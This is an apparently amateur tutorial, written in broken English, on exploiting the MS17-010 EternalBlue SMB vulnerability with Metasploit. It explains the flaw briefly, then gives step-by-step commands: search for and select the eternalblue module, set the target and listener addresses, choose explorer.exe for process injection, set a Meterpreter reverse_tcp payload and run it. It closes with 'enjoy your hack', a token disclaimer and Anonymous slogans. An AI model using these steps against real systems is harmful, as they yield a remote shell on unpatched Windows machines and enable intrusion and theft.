Greetings hacker My english is quite bad and also correct me if am wrong cuz we learn from our mistake so lets begin
EternalBlue is an exploit most likely developed by the NSA as a former zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which has possible ties to the Tailored Access Operations unit of the NSA.
EternalBlue, also known as MS17-010, is a vulnerability in Microsoft’s Server Message Block (SMB) protocol. SMB allows systems to share access to files, printers, and other resources on the network. The vulnerability is allowed to occur because earlier versions of SMB contain a flaw that lets an attacker establish a null session connection via anonymous login. An attacker can then send malformed packets and ultimately execute arbitrary commands on the target.
Step 1
The first thing we need to do is open up the terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it is not running already, followed by msfconsole.
Step 2
search eternalblue
It will show like this
Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
There is an auxiliary scanner that we can run to determine if a target is vulnerable to MS17-010.
Step 3
One we discover that target is vunerable with eternalblue Ms17-010
We can enter command
use exploit/windows/smb/ms17_010_eternalblue
Then type show options
Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Exploit target: Id Name – ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Set rhost target ip like 192.168.bla.bla.bla
Set lhost your ip bla.bla.bla.blaa.bla
Set lport any port like 4444 or 8080
Set processinject explorer.exe
set payload windows/x64/meterpreter/reverse_tcp
Note do not change r port leave it as it is cuz it work on port 445 if u change r port it wont work
And last u have to type Exploit
And enjoy your hack [but dont do it for mallicious purpose i am not responsible for that]
If i left something wrong correct it thanks …
We r anonymous
We r legion
Expect us